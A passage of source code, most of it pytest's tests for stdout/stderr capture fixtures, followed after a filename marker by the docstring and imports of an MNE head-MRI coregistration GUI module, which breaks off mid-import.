assert outerr == ("", "")
outerr = capman.suspend_global_capture()
assert outerr == ("", "")
print("hello")
out, err = capman.suspend_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
out, err = capman.suspend_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@needsosdup
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, "capman.start_global_capturing()")
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ['fd', 'sys'])
def test_capturing_unicode(testdir, method):
if hasattr(sys, "pypy_version_info") and sys.pypy_version_info < (2, 2):
pytest.xfail("does not work on pypy < 2.2")
if sys.version_info >= (3, 0):
obj = "'b\u00f6y'"
else:
obj = "u'\u00f6y'"
testdir.makepyfile("""
# coding=utf8
# taken from issue 227 from nosetests
def test_unicode():
import sys
print (sys.stdout)
print (%s)
""" % obj)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines([
"*1 passed*"
])
@pytest.mark.parametrize("method", ['fd', 'sys'])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile("""
def test_unicode():
print ('b\\u00f6y')
""")
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines([
"*1 passed*"
])
def test_collect_capturing(testdir):
p = testdir.makepyfile("""
print ("collect %s failure" % 13)
import xyz42123
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*Captured stdout*",
"*collect 13 failure*",
])
class TestPerTestCapturing(object):
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile("""
def setup_module(mod):
print ("setup module")
def setup_function(function):
print ("setup " + function.__name__)
def test_func1():
print ("in func1")
assert 0
def test_func2():
print ("in func2")
assert 0
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
])
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile("""
import sys
def setup_module(func):
print ("module-setup")
def setup_function(func):
print ("function-setup")
def test_func():
print ("in function")
assert 0
def teardown_function(func):
print ("in teardown")
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
])
def test_no_carry_over(self, testdir):
p = testdir.makepyfile("""
def test_func1():
print ("in func1")
def test_func2():
print ("in func2")
assert 0
""")
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile("""
def setup_function(function):
print ("setup func1")
def teardown_function(function):
print ("teardown func1")
assert 0
def test_func1():
print ("in func1")
pass
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
'*teardown_function*',
'*Captured stdout*',
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
])
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile("""
def teardown_module(mod):
print ("teardown module")
assert 0
def test_func():
pass
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
])
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile("""
import sys
def test_capturing():
print (42)
sys.stderr.write(str(23))
def test_capturing_error():
print (1)
sys.stderr.write(str(2))
raise ValueError
""")
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines([
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
])
class TestLoggingInteraction(object):
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile("""
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
""")
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile("""
import logging
def setup_function(function):
logging.warn("hello1")
def test_logging():
logging.warn("hello2")
assert 0
def teardown_function(function):
logging.warn("hello3")
assert 0
""")
for optargs in (('--capture=sys',), ('--capture=fd',)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines([
"*WARN*hello3", # errors show first!
"*WARN*hello1",
"*WARN*hello2",
])
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile("""
import logging
def setup_module(function):
logging.warn("hello1")
def test_logging():
logging.warn("hello2")
assert 0
def teardown_module(function):
logging.warn("hello3")
assert 0
""")
for optargs in (('--capture=sys',), ('--capture=fd',)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines([
"*WARN*hello3", # errors come first
"*WARN*hello1",
"*WARN*hello2",
])
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest("""
import logging
logging.basicConfig()
logging.warn("hello435")
""")
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == EXIT_NOTESTSCOLLECTED
result.stderr.fnmatch_lines([
"WARNING*hello435*",
])
assert 'operation on closed file' not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest("""
import logging
logging.basicConfig()
""")
# make sure that logging is still captured in tests
p = testdir.makepyfile("""
def test_hello():
import logging
logging.warn("hello433")
assert 0
""")
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines([
"WARNING*hello433*",
])
assert 'something' not in result.stderr.str()
assert 'operation on closed file' not in result.stderr.str()
class TestCaptureFixture(object):
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource("""
def test_hello(capsys):
print (42)
out, err = capsys.readouterr()
assert out.startswith("42")
""", *opt)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile("""
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 error*"])
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile("""
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*test_one*",
"*capsys*capfd*same*time*",
"*test_two*",
"*capfd*capsys*same*time*",
"*2 failed in*",
])
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile("""
def test_one(capsys, capfdbinary):
pass
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*ERROR*setup*test_one*",
"E*capfdbinary*capsys*same*time*",
"*1 error*"])
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile("""
def test_hello(cap%s):
print ("xxx42xxx")
assert 0
""" % method)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"xxx42xxx",
])
@needsosdup
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource("""
def test_hello(capfd):
import os
os.write(1, "42".encode('ascii'))
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
""")
reprec.assertoutcome(passed=1)
@needsosdup
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource("""
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
""")
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
sys.version_info < (3,),
reason='only have capsysbinary in python 3',
)
def test_capsysbinary(self, testdir):
reprec = testdir.inline_runsource("""
def test_hello(capsysbinary):
import sys
# some likely un-decodable bytes
sys.stdout.buffer.write(b'\\xfe\\x98\\x20')
out, err = capsysbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
""")
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
sys.version_info >= (3,),
reason='only have capsysbinary in python 3',
)
def test_capsysbinary_forbidden_in_python2(self, testdir):
testdir.makepyfile("""
def test_hello(capsysbinary):
pass
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*test_hello*",
"*capsysbinary is only supported on python 3*",
"*1 error in*",
])
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile("""
def test_hello(capsys, missingarg):
pass
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*test_partial_setup_failure*",
"*1 error*",
])
@needsosdup
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile("""
def test_hello(capfd):
import os
os.write(1, str(42).encode('ascii'))
raise KeyboardInterrupt()
""")
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines([
"*KeyboardInterrupt*"
])
assert result.ret == 2
@pytest.mark.issue14
def test_capture_and_logging(self, testdir):
p = testdir.makepyfile("""
import logging
def test_log(capsys):
logging.error('x')
""")
result = testdir.runpytest_subprocess(p)
assert 'closed' not in result.stderr.str()
@pytest.mark.parametrize('fixture', ['capsys', 'capfd'])
@pytest.mark.parametrize('no_capture', [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile("""
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(fixture=fixture))
args = ('-s',) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines("""
*while capture is disabled*
""")
assert 'captured before' not in result.stdout.str()
assert 'captured after' not in result.stdout.str()
if no_capture:
assert 'test_normal executed' in result.stdout.str()
else:
assert 'test_normal executed' not in result.stdout.str()
@pytest.mark.parametrize('fixture', ['capsys', 'capfd'])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""
Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
"""
testdir.makepyfile("""
from __future__ import print_function
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(fixture=fixture))
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines("*1 passed*")
assert 'stdout contents begin' not in result.stdout.str()
assert 'stderr contents begin' not in result.stdout.str()
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(_pytest._code.Source("""
def pytest_runtest_setup(item):
raise ValueError(42)
"""))
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, '--traceconfig')
result.stdout.fnmatch_lines([
"*ValueError(42)*",
"*1 error*"
])
def test_fdfuncarg_skips_on_no_osdup(testdir):
testdir.makepyfile("""
import os
if hasattr(os, 'dup'):
del os.dup
def test_hello(capfd):
pass
""")
result = testdir.runpytest_subprocess("--capture=no")
result.stdout.fnmatch_lines([
"*1 skipped*"
])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest("""
def pytest_runtest_setup():
print ("hello19")
""")
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
assert 'hello19' not in result.stdout.str()
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile("""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
""")
result = testdir.runpytest('--cap=fd')
result.stdout.fnmatch_lines('''
*def test_func*
*assert 0*
*Captured*
*1 failed*
''')
def test_capture_early_option_parsing(testdir):
testdir.makeconftest("""
def pytest_runtest_setup():
print ("hello19")
""")
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert 'hello19' in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
""")
result = testdir.runpytest('--assert=plain')
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
""")
result = testdir.runpytest_subprocess(
"-p", "pytest_xyz", "--version", syspathinsert=True
)
result.stderr.fnmatch_lines([
"*in bad_snap",
" raise Exception('boom')",
"Exception: boom",
])
class TestCaptureIO(object):
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
if sys.version_info >= (3, 0):
f.write("\u00f6")
pytest.raises(TypeError, "f.write(bytes('hello', 'UTF-8'))")
else:
f.write(unicode("\u00f6", 'UTF-8'))
f.write("hello") # bytes
s = f.getvalue()
f.close()
assert isinstance(s, unicode)
@pytest.mark.skipif(
sys.version_info[0] == 2,
reason='python 3 only behaviour',
)
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b'foo\r\n')
assert f.getvalue() == 'foo\r\n'
def test_bytes_io():
f = py.io.BytesIO()
f.write(tobytes("hello"))
pytest.raises(TypeError, "f.write(totext('hello'))")
s = f.getvalue()
assert s == tobytes("hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert not f.isatty()
pytest.raises(IOError, f.read)
pytest.raises(IOError, f.readlines)
pytest.raises(IOError, iter, f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
@pytest.mark.skipif('sys.version_info < (3,)', reason='python2 has no buffer')
def test_dontreadfrominput_buffer_python3():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
fb = f.buffer
assert not fb.isatty()
pytest.raises(IOError, fb.read)
pytest.raises(IOError, fb.readlines)
pytest.raises(IOError, iter, fb)
pytest.raises(ValueError, fb.fileno)
f.close() # just for completeness
@pytest.mark.skipif('sys.version_info >= (3,)', reason='python2 has no buffer')
def test_dontreadfrominput_buffer_python2():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
with pytest.raises(AttributeError):
f.buffer
f.close() # just for completeness
@pytest.yield_fixture
def tmpfile(testdir):
f = testdir.makepyfile("").open('wb+')
yield f
if not f.closed:
f.close()
@needsosdup
def test_dupfile(tmpfile):
flist = []
for i in range(5):
nf = capture.safe_text_dupfile(tmpfile, "wb")
assert nf != tmpfile
assert nf.fileno() != tmpfile.fileno()
assert nf not in flist
print(i, end="", file=nf)
flist.append(nf)
fname_open = flist[0].name
assert fname_open == repr(flist[0].buffer)
for i in range(5):
f = flist[i]
f.close()
fname_closed = flist[0].name
assert fname_closed == repr(flist[0].buffer)
assert fname_closed != fname_open
tmpfile.seek(0)
s = tmpfile.read()
assert "01234" in repr(s)
tmpfile.close()
assert fname_closed == repr(flist[0].buffer)
def test_dupfile_on_bytesio():
io = py.io.BytesIO()
f = capture.safe_text_dupfile(io, "wb")
f.write("hello")
assert io.getvalue() == b"hello"
assert 'BytesIO object' in f.name
def test_dupfile_on_textio():
io = py.io.TextIO()
f = capture.safe_text_dupfile(io, "wb")
f.write("hello")
assert io.getvalue() == "hello"
assert not hasattr(f, 'name')
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = py.process.cmdexec("lsof -p %d" % pid)
except (py.process.cmdexec.Error, UnicodeDecodeError):
# about UnicodeDecodeError, see note on pytester
pytest.skip("could not run 'lsof'")
yield
out2 = py.process.cmdexec("lsof -p %d" % pid)
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture(object):
pytestmark = needsosdup
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = tobytes("hello")
os.write(fd, data)
s = cap.snap()
cap.done()
assert not s
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open('wb+') as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(ValueError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self, tmpfile):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == tobytes('')
def test_writeorg(self, tmpfile):
data1, data2 = tobytes("foo"), tobytes("bar")
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2)
scap = cap.snap()
cap.done()
assert scap == totext(data1)
with open(tmpfile.name, 'rb') as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self, tmpfile):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = tobytes("hello")
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, tobytes("world"))
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, tobytes("but now"))
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AttributeError, cap.suspend)
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture(object):
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hx\xc4\x85\xc4\x87")
out, err = cap.readouterr()
assert out == py.builtin._totext("hx\xc4\x85\xc4\x87\n", "utf8")
@pytest.mark.skipif('sys.version_info >= (3,)',
reason='text output different for bytes on python3')
def test_capturing_readouterr_decode_error_handling(self):
with self.getcapture() as cap:
# triggered a internal error in pytest
print('\xa6')
out, err = cap.readouterr()
assert out == py.builtin._totext('\ufffd\n', 'unicode-escape')
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(IOError, "sys.stdin.read()")
class TestStdCaptureFD(TestStdCapture):
pytestmark = needsosdup
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile("""
import os
def test_x():
os.write(1, "hello\\n".encode("ascii"))
assert 0
""")
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines("""
*test_x*
*assert 0*
*Captured stdout*
""")
def test_intermingling(self):
with self.getcapture() as cap:
oswritebytes(1, "1")
sys.stdout.write(str(2))
sys.stdout.flush()
oswritebytes(1, "3")
oswritebytes(2, "a")
sys.stderr.write("b")
sys.stderr.flush()
oswritebytes(2, "c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD(object):
pytestmark = needsosdup
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile("""
import os
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_,
Capture=capture.FDCapture)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
cap.stop_capturing()
""")
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()['passed'] == 3
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = 'test text'
print(test_text.encode(sys.stdout.encoding, 'replace'))
(out, err) = capsys.readouterr()
assert out
assert err == ''
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
@needsosdup
@pytest.mark.parametrize('use', [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
if not use:
tmpfile = True
cap = StdCaptureFD(out=False, err=tmpfile)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
@needsosdup
def test_close_and_capture_again(testdir):
testdir.makepyfile("""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
""")
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines("""
*test_capture_again*
*assert 0*
*stdout*
*hello*
""")
@pytest.mark.parametrize('method', ['SysCapture', 'FDCapture'])
def test_capturing_and_logging_fundamentals(testdir, method):
if method == "StdCaptureFD" and not hasattr(os, 'dup'):
pytest.skip("need os.dup")
# here we check a fundamental feature
p = testdir.makepyfile("""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(out=False, in_=False,
Capture=capture.%s)
cap.start_capturing()
logging.warn("hello1")
outerr = cap.readouterr()
print ("suspend, captured %%s" %%(outerr,))
logging.warn("hello2")
cap.pop_outerr_to_orig()
logging.warn("hello3")
outerr = cap.readouterr()
print ("suspend2, captured %%s" %% (outerr,))
""" % (method,))
result = testdir.runpython(p)
result.stdout.fnmatch_lines("""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
""")
result.stderr.fnmatch_lines("""
WARNING:root:hello2
""")
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile("""
import sys
def test_capattr():
assert sys.stdout.errors == "strict"
assert sys.stderr.errors == "strict"
""")
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(not sys.platform.startswith('win') and sys.version_info[:2] >= (3, 6),
reason='only py3.6+ on windows')
def test_py36_windowsconsoleio_workaround_non_standard_streams():
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream(object):
def write(self, s):
pass
stream = DummyStream()
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile("""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
""")
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
testdir.makepyfile('''
from __future__ import print_function
import time
import threading
import sys
def spam():
f = sys.stderr
while True:
print('.', end='', file=f)
def test_silly():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
time.sleep(0.5)
''')
result = testdir.runpytest_subprocess()
assert result.ret == 0
assert 'IOError' not in result.stdout.str()
def test_pickling_and_unpickling_encoded_file():
# See https://bitbucket.org/pytest-dev/pytest/pull-request/194
# pickle.loads() raises infinite recursion if
# EncodedFile.__getattr__ is not implemented properly
ef = capture.EncodedFile(None, None)
ef_as_str = pickle.dumps(ef)
pickle.loads(ef_as_str)
|
_coreg_gui.py
|
# -*- coding: utf-8 -*-
u"""Traits-based GUI for head-MRI coregistration.
Hierarchy
---------
This is the hierarchy of classes for control. Brackets like [1] denote
properties that are set to be equivalent.
::
CoregFrame: GUI for head-MRI coregistration.
|-- CoregModel (model): Traits object for estimating the head mri transform.
| |-- MRIHeadWithFiducialsModel (mri) [1]: Represent an MRI head shape (high and low res) with fiducials.
| | |-- SurfaceSource (bem_high_res): High-res MRI head
| | |-- SurfaceSource (bem_low_res): Low-res MRI head
| | +-- MRISubjectSource (subject_source) [2]: Find subjects in SUBJECTS_DIR and select one.
| |-- FiducialsSource (fid): Expose points of a given fiducials fif file.
| +-- DigSource (hsp): Expose measurement information from an inst file.
|-- MlabSceneModel (scene) [3]: mayavi.core.ui.mayavi_scene
|-- DataPanel (data_panel)
| |-- HeadViewController (headview) [4]: Set head views for the given coordinate system.
| | +-- MlabSceneModel (scene) [3*]: ``HeadViewController(scene=CoregFrame.scene)``
| |-- SubjectSelectorPanel (subject_panel): Subject selector panel
| | +-- MRISubjectSource (model) [2*]: ``SubjectSelectorPanel(model=self.model.mri.subject_source)``
| +-- FiducialsPanel (fid_panel): Set fiducials on an MRI surface.
| |-- MRIHeadWithFiducialsModel (model) [1*]: ``FiducialsPanel(model=CoregFrame.model.mri, headview=CoregFrame.headview)``
| |-- HeadViewController (headview) [4*]: ``FiducialsPanel(model=CoregFrame.model.mri, headview=CoregFrame.headview)``
| +-- SurfaceObject (hsp_obj) [5*]: ``CoregFrame.fid_panel.hsp_obj = CoregFrame.mri_obj``
|-- CoregPanel (coreg_panel): Coregistration panel for Head<->MRI with scaling.
| +-- FittingOptionsPanel (fitting_options_panel): panel for fitting options.
|-- SurfaceObject (mri_obj) [5]: Represent a solid object in a mayavi scene.
+-- PointObject ({hsp, eeg, lpa, nasion, rpa, hsp_lpa, hsp_nasion, hsp_rpa} + _obj): Represent a group of individual points in a mayavi scene.
In the MRI viewing frame, MRI points are transformed via scaling, then by
mri_head_t to the Neuromag head coordinate frame. Digitized points (in head
coordinate frame) are never transformed.
Units
-----
User-facing GUI values are in readable units:
- ``scale_*`` are in %
- ``trans_*`` are in mm
- ``rot_*`` are in °
Internal computation quantities ``parameters`` are in units of (for X/Y/Z):
- ``parameters[:3]`` are in radians
- ``parameters[3:6]`` are in m
- ``parameters[6:9]`` are in scale proportion
Conversions are handled via `np.deg2rad`, `np.rad2deg`, and appropriate
multiplications / divisions.
""" # noqa: E501
# Authors: Christian Brodbeck <christianbrodbeck@nyu.edu>
#
# License: BSD (3-clause)
import os
import queue
import re
import time
from threading import Thread
import traceback
import warnings
import numpy as np
from mayavi.core.ui.mayavi_scene import MayaviScene
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import (error, confirm, OK, YES, NO, CANCEL, information,
FileDialog, GUI)
from traits.api import (Bool, Button, cached_property, DelegatesTo, Directory,
Enum, Float, HasTraits, HasPrivateTraits, Instance,
Int, on_trait_change, Property, Str, List)
from traitsui.api import (View, Item, Group, HGroup, VGroup, VGrid, EnumEditor,
